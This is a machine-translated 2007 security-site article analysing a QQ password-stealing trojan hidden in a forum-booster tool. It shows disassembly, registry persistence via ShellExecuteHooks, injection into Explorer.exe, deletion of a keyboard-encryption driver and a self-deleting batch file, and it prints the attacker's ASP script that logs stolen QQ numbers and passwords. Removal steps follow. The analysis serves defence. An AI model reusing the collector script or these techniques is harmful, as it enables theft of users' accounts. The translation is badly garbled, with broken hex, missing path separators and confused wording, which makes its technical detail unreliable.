Analysis of black anti-CD QQ black hand-vulnerability warning-the black bar safety net

2007-01-11T00:00:00
ID MYHACK58:62200713698
Type myhack58
Reporter 佚名
Modified 2007-01-11T00:00:00

Description

Look at the hack line of Defense for the official announcement, 6 issues disc this month I promote the column, the moving network vulnerabilities using the animation included with the tool will make the antivirus Alarm, tips for Trojan-PSW. Win32. QQShou. ed. A thought, my old magic computer black, actually there more than I black. Appears to be green out of the blue...... So put this malicious program analysis a bit, kind of give yourself to enhance the Manual override for the experience, but also help in horses friends, put his clean the dry clean net. The first PEID to check the shell, UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus &Laszlo [Overlay], online n a multi-husking machine, I this will not go DOWN, the direct use of PEID UPX FILEINFO plug-in, you can easily get UPX packers OEP is.

Here the OEP is: 4056D8 direct OD load. F4, to 4056D8 put him DOWN. Husking is finished. Then use PEID a search, Borland Delphi 6.0 - 7.0, the shelling, whether the repair is up to you. Anyway, we're not running. With OD loaded after shelling program, to analyze it. 0 0 4 0 4 9 3 5 5 0 PUSH EAX 0 0 4 0 4 9 3 6 E8 71FCFFFF CALL <JMP.& amp;kernel32. GetSystemDirectoryA> //returns the WINDOWS SYSTEM directory path 0040493B 85C0 TEST EAX,EAX 0040493D 7 5 0 7 JNZ SHORT 2.00404946 0040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-1 0 0],4 3 0 0 4 0 4 9 4 6 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-1 0 0] 0040494C 5 0 PUSH EAX 0040494D E8 E2FCFFFF CALL <JMP.& amp;USER32. IsCharAlphaA> //determine whether a string is a letter 0 0 4 0 4 9 5 2 83F8 0 1 CMP EAX,1 0 0 4 0 4 9 5 5 1BC0 SBB EAX,EAX 0 0 4 0 4 9 5 7 4 0 INC EAX 0 0 4 0 4 9 5 8 84C0 TEST AL,AL 0040495A 7 5 0 7 JNZ SHORT 2.00404963 0040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-1 0 0],4 3 //here's the Hex(4 3)=Char(C) C disc La~~ 0 0 4 0 4 9 6 3 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-1 0 4] 0 0 4 0 4 9 6 9 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-1 0 0] 0040496F E8 CCEDFFFF CALL 2.00403740 0 0 4 0 4 9 7 4 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-1 0 4] 0040497A 8BC3 MOV EAX,EBX 0040497C B9 B4494000 MOV ECX,2. 004049B4 ; :program filesinternet explorerplugins 0 0 4 0 4 9 8 1 E8 2EEEFFFF CALL 2. 004037B4 0 0 4 0 4 9 8 6 33C0 XOR EAX,EAX 0 0 4 0 4 9 8 8 5A POP EDX 0 0 4 0 4 9 8 9 5 9 POP ECX 0040498A 5 9 POP ECX The program is running, the first will be in the system directory create a file, the path is: C:Program FilesInternet ExplorerPLUGINS Came to this place, you'll find one more file bow. sys Dynamic Link Library and a bow. bak two files, how to judge is a Trojan generated, You pay attention to look at the file creation date will be found. Note that this file is hidden, it is necessary to show all files to see. We OD, to look at the bow. sys Files content, 003E4E1A |. 5 0 PUSH EAX /pDisposition 003E4E1B |. 8D4424 0 4 LEA EAX,DWORD PTR SS:[ESP+4] ; | 003E4E1F |. 5 0 PUSH EAX ; |pHandle 003E4E20 |. 6A 0 0 PUSH 0 ; |pSecurity = NULL 003E4E22 |. 6 8 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS 003E4E27 |. 6A 0 0 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE 003E4E29 |. 6A 0 0 PUSH 0 ; |Class = NULL 003E4E2B |. 6A 0 0 PUSH 0 ; |Reserved = 0 003E4E2D |. 6 8 744E3E00 PUSH bow. 003E4E74 ; |softwaremsqqguishou 003E4E32 |. 6 8 0 1 0 0 0 0 8 0 PUSH 8 0 0 0 0 0 0 1 ; |hKey = HKEY_CURRENT_USER 003E4E37 |. E8 54F4FFFF CALL <JMP.& amp;advapi32. RegCreateKeyExA> ; RegCreateKeyExA Write the registry, HKEY_CURRENT_USERSoftwareMsQQGuishou “QQGuiShou”Pinyin“QQ Ghost hand”? According to Google records, there is this stolen Q software, To continue the analysis :0 0 4 0 7 7 1 5 A124A14000 mov eax, dword ptr [0040A124] :0040771A 8B4018 mov eax, dword ptr [eax+1 8] :0040771D 5 0 push eax :0040771E A124A14000 mov eax, dword ptr [0040A124] :0 0 4 0 7 7 2 3 8B4014 mov eax, dword ptr [eax+1 4] :0 0 4 0 7 7 2 6 5 0 push eax Possible StringData Ref from Code Obj ->"QQ Blaster give you gifts! - >(" :0 0 4 0 7 7 2 7 68947A4000 push 00407A94 :0040772C FF75F8 push [ebp-0 8] Possible StringData Ref from Code Obj ->"----" :0040772F 68B87A4000 push 00407AB8 :0 0 4 0 7 7 3 4 FF75F4 push [ebp-0C] :0 0 4 0 7 7 3 7 68C87A4000 push 00407AC8 :0040773C 8D45CC lea eax, dword ptr [ebp-3 4] :0040773F BA05000000 mov edx, 0 0 0 0 0 0 0 5 :0 0 4 0 7 7 4 4 E853BDFFFF call 0040349C :0 0 4 0 7 7 4 9 8B45CC mov eax, dword ptr [ebp-3 4] :0040774C 5 0 push eax Possible StringData Ref from Code Obj ->" number:" :0040774D 68D47A4000 push 00407AD4 :0 0 4 0 7 7 5 2 FF75F8 push [ebp-0 8] Possible StringData Ref from Code Obj ->"---- password:" :0 0 4 0 7 7 5 5 68E47A4000 push 00407AE4 :0040775A FF75F4 push [ebp-0C] Possible StringData Ref from Code Obj ->"---- available game currency:" :0040775D 68F87A4000 push 00407AF8 :0 0 4 0 7 7 6 2 8D55C4 lea edx, dword ptr [ebp-3C] :0 0 4 0 7 7 6 5 8B45DC mov eax, dword ptr [ebp-2 4] :0 0 4 0 7 7 6 8 E8E7D7FFFF call 00404F54 :0040776D FF75C4 push [ebp-3C] Possible StringData Ref from Code Obj ->"---- save:" :0 0 4 0 7 7 7 0 68147B4000 push 00407B14 :0 0 4 0 7 7 7 5 8D55C0 lea edx, dword ptr [ebp-4 0] :0 0 4 0 7 7 7 8 8B45E0 mov eax, dword ptr [ebp-2 0] :0040777B E8D4D7FFFF call 00404F54 :0 0 4 0 7 7 8 0 FF75C0 push [ebp-4 0] Possible StringData Ref from Code Obj ->"---- credits:" :0 0 4 0 7 7 8 3 682C7B4000 push 00407B2C :0 0 4 0 7 7 8 8 8D55BC lea edx, dword ptr [ebp-4 4] :0040778B 8B45EC mov eax, dword ptr [ebp-1 4] :0040778E E8C1D7FFFF call 00404F54 :0 0 4 0 7 7 9 3 FF75BC push [ebp-4 4] Possible StringData Ref from Code Obj ->"---- whether it is a member:" :0 0 4 0 7 7 9 6 68407B4000 push 00407B40 :0040779B 8D55B8 lea edx, dword ptr [ebp-4 8] :0040779E 8B45D4 mov eax, dword ptr [ebp-2C] :004077A1 E8AED7FFFF call 00404F54 :004077A6 FF75B8 push [ebp-4 8]

  • Possible StringData Ref from Code Obj ->"---- grade:" | :004077A9 685C7B4000 push 00407B5C :004077AE 8D55B4 lea edx, dword ptr [ebp-4C] :004077B1 8B45D0 mov eax, dword ptr [ebp-3 0] :004077B4 E89BD7FFFF call 00404F54 :004077B9 FF75B4 push [ebp-4C]

  • Possible StringData Ref from Code Obj ->"---- game point:" | :004077BC 68707B4000 push 00407B70 :004077C1 8D55B0 lea edx, dword ptr [ebp-5 0] :004077C4 8B45E4 mov eax, dword ptr [ebp-1C] :004077C7 E888D7FFFF call 00404F54 :004077CC FF75B0 push [ebp-5 0]

  • Possible StringData Ref from Code Obj ->"---- IP:" “QQ Blaster give you gifts!” It really is a gift, through the QQ station on the query, put your QQ Number: password: available game currency: No Yes member: points: level: game points: IP, all of the information as a gift to send out. Writing its own sys to here. Plus the program later in the configuration information. Hey. Now the Trojans are bigger and better.... Using ASP web form post submission, and save the received password, interested friends can grab a package and look, I'm not here to Rob someone else's labor fruit. Receive the password the ASP code is as follows: <% LogFile="log.txt" LogFileGB="LOGGB.txt" QQNumber=request("Number") QQPassWord=request("PassWord") QQGBA=request("yxba") QQGBB=request("yxbb") if QQGBA="" then QQGBA="no" end if if QQGBB="" then QQGBB="no" end if LogText=QQNumber&"----"&amp; QQPassWord LogTextGB=QQNumber&"----"&amp; QQPassWord &"---- QQGBA:"& amp; QQGBA&"---- QQGBB:"& amp; QQGBB set f=Server. CreateObject("scripting. filesystemobject") set ff=f. opentextfile(server. mappath(".")& amp;""&LogFile,8,true,0) ff. writeline(LogText) ff. close set ff=nothing set f=nothing set f1=Server. CreateObject("scripting. filesystemobject") set ff1=f1. opentextfile(server. mappath(".")& amp;""&amp; LogFileGB,8,true,0) ff1. writeline(LogTextGB) ff1. close set ff1=nothing set f1=nothing %> 00404AFB 5 5 PUSH EBP 00404AFC 6 8 A04B4000 PUSH 2. 00404BA0 00404B01 6 4:FF30 PUSH DWORD PTR FS:[EAX] 00404B04 6 4:8 9 2 0 MOV DWORD PTR FS:[EAX],ESP 00404B07 6 8 AC4B4000 PUSH 2.00404 BAC 00404B0C B9 B04B4000 MOV ECX,2. 00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb} 00404B11 BA D84B4000 MOV EDX,2. 00404BD8 ; softwaremicrosoftwindowscurrentversionexplorershellexecutehooks 00404B16 B8 0 2 0 0 0 0 8 0 MOV EAX,8 0 0 0 0 0 0 2 00404B1B E8 70FFFFFF CALL 2. 00404A90 00404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00404B23 BA 284C4000 MOV EDX,2. 00404C28 ; clsid{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb} 00404B28 E8 8BEBFFFF CALL 2. 004036B8 00404B2D 6 8 AC4B4000 PUSH 2.00404 BAC 00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00404B35 E8 1EEEFFFF CALL 2.00403958 00404B3A 8BD0 MOV EDX,EAX 00404B3C B9 AC4B4000 MOV ECX,2.00404 BAC 00404B41 B8 0 0 0 0 0 0 8 0 MOV EAX,8 0 0 0 0 0 0 0 00404B46 E8 45FFFFFF CALL 2. 00404A90 00404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00404B4E BA 604C4000 MOV EDX,2. 00404C60 ; inprocserver32apartment 00404B53 E8 18ECFFFF CALL 2.00403770

Write registry key value 8 0 0 0 0 0 0 0 SOFTWAREMicrosoftWindowsCurrentVersionexplorershellexecutehooks" {F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}. com component services: 0012FF20 8 0 0 0 0 0 0 0 |hKey = HKEY_CLASSES_ROOT 0012FF24 00404C28 |Subkey = "THE CLSID{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}" Finally LoadLibary to run the Trojan program.

00404E56 8B95 2CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1D4] 00404E5C 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 00404E5F B9 B44F4000 MOV ECX,2. 00404FB4 ; microsoft. bat 00404E64 E8 4BE9FFFF CALL 2. 004037B4 00404E69 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 00404E6C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404E72 E8 B1DBFFFF CALL 2. 00402A28 00404E77 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404E7D E8 42D9FFFF CALL 2. 004027C4 00404E82 E8 11D7FFFF CALL 2.00402598 00404E87 BA CC4F4000 MOV EDX,2.00404 FCC ; :try 00404E8C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404E92 E8 55ECFFFF CALL 2.00403 AEC 00404E97 E8 A8DEFFFF CALL 2. 00402D44 00404E9C E8 F7D6FFFF CALL 2.00402598 00404EA1 6 8 DC4F4000 PUSH 2.00404 FDC ; del" 00404EA6 8D95 20FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E0] 00404EAC 33C0 XOR EAX,EAX 00404EAE E8 41D8FFFF CALL 2. 004026F4 00404EB3 FFB5 20FEFFFF PUSH DWORD PTR SS:[EBP-1E0] 00404EB9 6 8 EC4F4000 PUSH 2.00404 FEC ;" 00404EBE 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC] 00404EC4 BA 0 3 0 0 0 0 0 0 MOV EDX,3 00404EC9 E8 5AE9FFFF CALL 2.00403828 00404ECE 8B95 24FEFFFF MOV EDX,DWORD PTR SS:[EBP-1DC] 00404ED4 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404EDA E8 0DECFFFF CALL 2.00403 AEC 00404EDF E8 60DEFFFF CALL 2. 00402D44 00404EE4 E8 AFD6FFFF CALL 2.00402598 00404EE9 6 8 F84F4000 PUSH 2. 00404FF8 ; if exist" 00404EEE 8D95 18FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E8] 00404EF4 33C0 XOR EAX,EAX 00404EF6 E8 F9D7FFFF CALL 2. 004026F4 00404EFB FFB5 18FEFFFF PUSH DWORD PTR SS:[EBP-1E8] 00404F01 6 8 EC4F4000 PUSH 2.00404 FEC ;" 00404F06 6 8 0C504000 PUSH 2.0040500 C ; goto try 00404F0B 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4] 00404F11 BA 0 4 0 0 0 0 0 0 MOV EDX,4 00404F16 E8 0DE9FFFF CALL 2.00403828 //this CALL calls LoadLibary to run the Trojan program 00404F1B 8B95 1CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1E4] 00404F21 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404F27 E8 C0EBFFFF CALL 2.00403 AEC 00404F2C E8 13DEFFFF CALL 2. 00402D44 00404F31 E8 62D6FFFF CALL 2.00402598 00404F36 BA 2 0 5 0 4 0 0 0 MOV EDX,2.00405020 ; del %0 00404F3B 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404F41 E8 A6EBFFFF CALL 2.00403 AEC 00404F46 E8 F9DDFFFF CALL 2. 00402D44 00404F4B E8 48D6FFFF CALL 2.00402598 00404F50 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0] 00404F56 E8 89DBFFFF CALL 2. 00402AE4 00404F5B E8 38D6FFFF CALL 2.00402598 I was in the desktop to debug, so will be generated on the desktop a microsoft. bat file that calls the CMD execution. The establishment of microsoft. bat file to delete itself. The contents inside is :try del "C:Documents and SettingsAdministrator 桌面 动 网 论坛 提升 工具 .exe" if exist "C:Documents and SettingsAdministrator 桌面 动 网 论坛 提升 工具 .exe" goto try del %0 Finally the end of the process sequence. 003E9B3D |. E8 7697FFFF CALL bow. 003E32B8 003E9B42 |. 6 8 D09D3E00 PUSH bow. 003E9DD0 ; ASCII "QQ.Exe" 003E9B47 |. A1 4CB83E00 MOV EAX,DWORD PTR DS:[3EB84C] 003E9B4C |. E8 8B9AFFFF CALL bow. 003E35DC 003E9B51 |. 8BD8 MOV EBX,EAX ; | 003E9B53 |. 5 3 PUSH EBX ; |String1 003E9B54 |. E8 4FA8FFFF CALL <JMP.& amp;kernel32. lstrcmpiA> ; lstrcmpiA 003E9B59 |. 85C0 TEST EAX,EAX 003E9B5B |. 7 5 7B JNZ SHORT bow. 003E9BD8 003E9B5D |. 8D45 B4 LEA EAX,DWORD PTR SS:[EBP-4C] 003E9B60 |. 8BD6 MOV EDX,ESI 003E9B62 |. B9 0 5 0 1 0 0 0 0 MOV ECX,1 0 5 003E9B67 |. E8 5898FFFF CALL bow. 003E33C4 003E9B6C |. 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C] 003E9B6F |. 8D55 B8 LEA EDX,DWORD PTR SS:[EBP-4 8] 003E9B72 |. E8 25C6FFFF CALL bow. 003E619C 003E9B77 |. 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-4 8] 003E9B7A |. B8 48B83E00 MOV EAX,bow. 003EB848 003E9B7F |. E8 3497FFFF CALL bow. 003E32B8 003E9B84 |. 8D45 B0 LEA EAX,DWORD PTR SS:[EBP-5 0] 003E9B87 |. B9 E09D3E00 MOV ECX,bow. 003E9DE0 ; ASCII "LoginCtrl.dll" 003E9B8C |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848] 003E9B92 |. E8 9198FFFF CALL bow. 003E3428 003E9B97 |. 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-5 0] 003E9B9A |. E8 3D9AFFFF CALL bow. 003E35DC 003E9B9F |. 5 0 PUSH EAX ; /FileName 003E9BA0 |. E8 BBA7FFFF CALL <JMP.& amp;kernel32. LoadLibraryA>; LoadLibraryA 003E9BA5 |. A3 18A13E00 MOV DWORD PTR DS:[3EA118],EAX 003E9BAA |. 8D45 AC LEA EAX,DWORD PTR SS:[EBP-5 4] 003E9BAD |. B9 F89D3E00 MOV ECX,bow. 003E9DF8 ; ASCII "npkcrypt.sys" 003E9BB2 |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848] 003E9BB8 |. E8 6B98FFFF CALL bow. 003E3428 003E9BBD |. 8B45 AC MOV EAX,DWORD PTR SS:[EBP-5 4] 003E9BC0 |. E8 179AFFFF CALL bow. 003E35DC 003E9BC5 |. 5 0 PUSH EAX ; /FileName 003E9BC6 |. E8 05A7FFFF CALL <JMP.& amp;kernel32. DeleteFileA> ; DeleteFileA 003E9BCB |. A1 28A13E00 MOV EAX,DWORD PTR DS:[3EA128] 003E9BD0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1 003E9BD6 |. EB 1E JMP SHORT bow. 003E9BF6 003E9BD8 |> 6 8 089E3E00 PUSH bow. 003E9E08 ; /String2 = "Explorer.Exe" 003E9BDD |. 5 3 PUSH EBX ; |String1 003E9BDE |. E8 C5A7FFFF CALL <JMP.& amp;kernel32. lstrcmpiA> ; lstrcmpiA 003E9BE3 |. 85C0 TEST EAX,EAX 003E9BE5 |. 0F85 BB010000 JNZ bow. 003E9DA6 003E9BEB |. A1 30A13E00 MOV EAX,DWORD PTR DS:[3EA130] 003E9BF0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1 003E9BF6 |> 6 8 0 4 0 1 0 0 0 0 PUSH 1 0 4 ; /BufSize = 1 0 4 (2 6 0.) 003E9BFB |. 5 6 PUSH ESI ; |PathBuffer 003E9BFC |. A1 50B63E00 MOV EAX,DWORD PTR DS:[3EB650] ; | 003E9C01 |. 5 0 PUSH EAX ; |hModule => NULL 003E9C02 |. E8 09A7FFFF CALL <JMP.& amp;kernel32. GetModuleFileNameA> ; GetModuleFileNameA 程序 插入 Explorer.exe process, very popular. Do not believe? We can use IceSword to see Explorer. exe process.

However, the Trojan in the loading time. Will delete npkcrypt. sys driver, according to Google records, QQ2005 Beta3 and later versions integrate a called npkcrypt the keyboard encryption program, the US said its Ming to protect the user password input security, in fact, is not consent of the user without permission in the user system is installed somehow drivers. Install this version, the password can not by the Paste method to input password as the Chinese QQ user can't login. Trojan delete npkcrypt. sys and then run the QQ of the original program, you can set the hook. In order to record you input the password. Trojan is a registered service, so you in from the start inside can not see the startup items. After has on the analysis, we can bow. sys to delete the file, delete the registry, presumably you can easily get rid of this Trojan. But there are complications. Is remove our npkcrypt. sys Driver, the computer reboot, will play the error warning window-to-talk service running error.

In“my computer”right click, Select“management”->“Device Manager”,select“View”/“Show hidden devices”in the“non-Plug and play drivers”, select“npkcrypt”, uninstall it, the optional restart,then CMD to run“regedit”in the registry to find the“nplcrypt”may be found“HKEY_LOCAL_MACHINESYSTEMControlSet001servicesnpkcrypt”or“HKEY_LOCAL_MACHINESYSTEMControlSet002servicesnpkcrypt”, etc. keys, and delete after a reboot will generally solve the problem, search npkcrypt.*, the Deleted. OK, this pony is ok. Finally BS about dismount people, drink from the source. How do you say, the Black Defense is also our rookie starting place, became a veteran, how can bully the little birds? Man to be kind.